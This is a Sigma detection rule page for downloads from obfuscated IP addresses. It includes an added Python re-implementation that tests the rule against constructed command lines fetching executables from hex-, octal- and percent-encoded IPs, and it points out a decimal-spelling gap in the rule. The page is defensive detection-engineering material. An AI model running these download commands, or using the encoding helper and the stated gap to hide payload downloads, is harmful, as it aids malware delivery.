Obfuscated IP Download Activity
Detects use of an encoded or obfuscated form of an IP address (hex, octal, ...) in a URL combined with a download command
Sigma rule
```yaml
title: Obfuscated IP Download Activity
id: cb5a2333-56cf-4562-8fcb-22ba1bca728d
status: test
description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
references:
    - https://h.43z.one/ipconverter/
    - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608
    - https://twitter.com/fr0s7_/status/1712780207105404948
author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
date: 2022-08-03
modified: 2025-07-18
tags:
    - attack.discovery
logsource:
    category: process_creation
    product: windows
detection:
    selection_command:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'iwr '
            - 'Invoke-RestMethod'
            - 'irm '
            - 'wget '
            - 'curl '
            - 'DownloadFile'
            - 'DownloadString'
    selection_ip_1:
        CommandLine|contains:
            - ' 0x'
            - '//0x'
            - '.0x'
            - '.00x'
    selection_ip_2:
        CommandLine|contains|all:
            - 'http://%'
            - '%2e'
    selection_ip_3:
        # http://81.4.31754
        - CommandLine|re: 'https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4}'
        # http://81.293898
        - CommandLine|re: 'https?://[0-9]{1,3}\.0[0-9]{3,7}'
        # http://1359248394
        - CommandLine|re: 'https?://0[0-9]{3,11}'
        # http://0121.04.0174.012
        - CommandLine|re: 'https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11}'
        # http://012101076012
        - CommandLine|re: 'https?://0[0-9]{1,11}'
        # For octal format
        - CommandLine|re: ' [0-7]{7,13}'
    filter_main_valid_ip:
        CommandLine|re: 'https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4}'
    condition: selection_command and 1 of selection_ip_* and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium
```
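To see what the detection block above actually catches, here is an added example (not code from the rule, from Sigma, or from its authors) that re-implements the `detection` section in Python and runs it over constructed process-creation command lines. It assumes the usual Sigma matching semantics: `contains` is a case-insensitive substring test, `re` is an unanchored case-sensitive search, a list of values is OR and `|all` is AND. The `obfuscate` helper, its field names and the sample IP 81.4.124.10 are ours; that IP was chosen because its mixed spellings (81.4.31754, 81.293898, 1359248394, 0121.04.0174.012) are the ones named in the rule's own comments.

```python
"""Re-implementation of the rule's detection block, run over constructed
process-creation command lines. Added example, not code from the rule or from
Sigma. Assumed Sigma semantics: `contains` is a case-insensitive substring
test, `re` is an unanchored case-sensitive search, a list under a selection
is OR, `|all` is AND."""
import ipaddress
import re

# The rule's selections, copied verbatim from the YAML above.
SELECTION_COMMAND = ["Invoke-WebRequest", "iwr ", "Invoke-RestMethod", "irm ",
                     "wget ", "curl ", "DownloadFile", "DownloadString"]
SELECTION_IP_1 = [" 0x", "//0x", ".0x", ".00x"]
SELECTION_IP_2_ALL = ["http://%", "%2e"]
SELECTION_IP_3 = [re.compile(p) for p in (
    r"https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4}",
    r"https?://[0-9]{1,3}\.0[0-9]{3,7}",
    r"https?://0[0-9]{3,11}",
    r"https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11}",
    r"https?://0[0-9]{1,11}",
    r" [0-7]{7,13}",
)]
FILTER_MAIN_VALID_IP = re.compile(
    r"https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4}")


def _contains_any(cmd: str, needles) -> bool:
    low = cmd.lower()
    return any(n.lower() in low for n in needles)


def matches(command_line: str) -> bool:
    """condition: selection_command and 1 of selection_ip_* and not 1 of filter_main_*"""
    selection_command = _contains_any(command_line, SELECTION_COMMAND)
    selection_ip = (
        _contains_any(command_line, SELECTION_IP_1)
        or all(n.lower() in command_line.lower() for n in SELECTION_IP_2_ALL)
        or any(r.search(command_line) for r in SELECTION_IP_3)
    )
    filtered = FILTER_MAIN_VALID_IP.search(command_line) is not None
    return selection_command and selection_ip and not filtered


def obfuscate(ip: str) -> dict:
    """Alternate spellings of a dotted quad that inet_aton-style parsers (and
    therefore curl, PowerShell and browsers) accept. Helper written for this
    example to generate test data; the names are ours, not the rule's."""
    a, b, c, d = (int(x) for x in ip.split("."))
    dword = int(ipaddress.IPv4Address(ip))
    return {
        "hex_dword": f"0x{dword:08X}",                              # 0x51047C0A
        "octal_dotted": ".".join(f"0{o:o}" for o in (a, b, c, d)),  # 0121.04.0174.012
        "dword": str(dword),                                        # 1359248394
        "mixed_3": f"{a}.{b}.{(c << 8) | d}",                       # 81.4.31754
        "mixed_2": f"{a}.{(b << 16) | (c << 8) | d}",               # 81.293898
        "pct_encoded": "".join(f"%{ord(ch):02x}" for ch in ip),     # %38%31%2e...
    }


def sample_command_lines(ip: str) -> dict:
    """Constructed command lines -> whether the rule fires on them."""
    f = obfuscate(ip)
    return {
        # hex dword host: selection_ip_1 ('//0x')
        f"powershell -c Invoke-WebRequest http://{f['hex_dword']}/p.exe -OutFile p.exe": True,
        # octal dotted host: selection_ip_3
        f"cmd /c curl http://{f['octal_dotted']}/p.exe -o p.exe": True,
        # percent-encoded host: selection_ip_2 ('http://%' and '%2e')
        f"powershell iwr http://{f['pct_encoded']}/p.ps1": True,
        # decimal mixed/dword hosts: every selection_ip_3 pattern needs a
        # leading 0 after the scheme or the last dot, so none of these match
        f"cmd /c curl http://{f['mixed_3']}/p.exe -o p.exe": False,
        f"cmd /c curl http://{f['mixed_2']}/p.exe -o p.exe": False,
        f"cmd /c curl http://{f['dword']}/p.exe -o p.exe": False,
        # plain dotted quad: ' 0x' in the output name hits selection_ip_1,
        # but filter_main_valid_ip suppresses the alert
        f"powershell Invoke-WebRequest http://{ip}/p.exe -OutFile 0x.bin": False,
        # download keyword, hostname, no IP at all
        "curl https://example.invalid/p.exe -o p.exe": False,
    }


if __name__ == "__main__":
    for cmd, expected in sample_command_lines("81.4.124.10").items():
        fired = matches(cmd)
        status = "ALERT" if fired else "quiet"
        check = "ok" if fired == expected else "MISMATCH"
        print(f"{status:5} {check:8} {cmd}")
```

Running it makes one property of the rule visible that is worth knowing before tuning: the hex (`0x`), octal (leading `0`) and percent-encoded (`%2e`) spellings fire, and a well-formed dotted quad is suppressed by `filter_main_valid_ip` even when another selection hits. The purely decimal spellings quoted in the `selection_ip_3` comments (`81.4.31754`, `81.293898`, `1359248394`) do not fire, because each regex in that selection requires a `0` immediately after `://` or after the last dot; if decimal dword URLs matter in your environment, they need their own pattern.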
Related rules
- Potential Active Directory Reconnaissance/Enumeration Via LDAP
- Malicious PowerShell Commandlets - PoshModule
- Malicious PowerShell Commandlets - ProcessCreation
- Malicious PowerShell Commandlets - ScriptBlock
- File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell